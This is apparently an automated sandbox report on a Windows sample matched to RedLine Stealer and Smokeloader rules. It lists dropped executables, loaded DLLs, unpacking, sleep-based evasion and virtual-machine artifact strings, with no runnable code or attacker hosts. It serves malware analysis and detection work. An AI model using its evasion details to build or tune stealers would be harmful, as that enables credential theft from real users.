Source: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: TN78WX7nJU.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C455.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@11/5

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_009BB366 CreateToolhelp32Snapshot,Module32First,

0_2_009BB366

Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Code function: 1_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

1_2_004361E0

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7396

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

File created: C:\Users\user\AppData\Local\Temp\C455.tmp

Jump to behavior

Source: TN78WX7nJU.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TN78WX7nJU.exe	Virustotal: Detection: 40%
Source: TN78WX7nJU.exe	ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\TN78WX7nJU.exe "C:\Users\user\Desktop\TN78WX7nJU.exe"
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Process created: C:\Users\user\AppData\Local\Temp\C455.tmp.exe "C:\Users\user\AppData\Local\Temp\C455.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1684
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Process created: C:\Users\user\AppData\Local\Temp\C455.tmp.exe "C:\Users\user\AppData\Local\Temp\C455.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Unpacked PE file: 1.2.C455.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Unpacked PE file: 0.2.TN78WX7nJU.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Unpacked PE file: 1.2.C455.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0043DB77 push dword ptr [esp+ecx-75h]; iretd	0_2_0043DB7B
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_009BC1B2 push es; iretd	0_2_009BC1C3
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_009C056A pushad ; ret	0_2_009C0586
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_009C06E8 push ecx; ret	0_2_009C0705
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_009BDABC pushad ; ret	0_2_009BDAE4
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_009BDF5D push 00000003h; ret	0_2_009BDF61
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024909CD push ecx; ret	0_2_024909E0
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024B799F push esp; retf	0_2_024B79A7
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0249CE18 push ss; retf	0_2_0249CE1D
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0248FFF3 push ecx; ret	0_2_02490006
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024B7F9D push esp; retf	0_2_024B7F9E
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024B9DE8 pushad ; retf	0_2_024B9DEF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041ACF6 push esp; iretd	1_2_0041ACFF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043F6EE push esp; iretd	1_2_0043F6EF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043BF00 push eax; mov dword ptr [esp], 49484716h	1_2_0043BF01
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A2C167 push eax; mov dword ptr [esp], 49484716h	1_2_00A2C168
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A2F555 push esp; iretd	1_2_00A2F556
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0AF5D push esp; iretd	1_2_00A0AF66
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00AFDAD5 pushad ; ret	1_2_00AFDADA
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00AFDD5B push ebp; ret	1_2_00AFDD60

Source: TN78WX7nJU.exe	Static PE information: section name: .text entropy: 7.543798990454789
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.371146835595198
Source: C455.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.371146835595198

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	File created: C:\Users\user\AppData\Local\Temp\C455.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Window / User API: threadDelayed 3458			Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Window / User API: threadDelayed 6529			Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-64410

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

API coverage: 5.1 %

Source: C:\Users\user\Desktop\TN78WX7nJU.exe TID: 7380	Thread sleep count: 3458 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe TID: 7380	Thread sleep time: -2496676s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe TID: 7380	Thread sleep count: 6529 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TN78WX7nJU.exe TID: 7380	Thread sleep time: -4713938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe TID: 7448	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Last function: Thread delayed

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000002.4215422078.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: C455.tmp.exe, 00000001.00000003.1985978022.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP;
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000002.4215422078.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`4
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
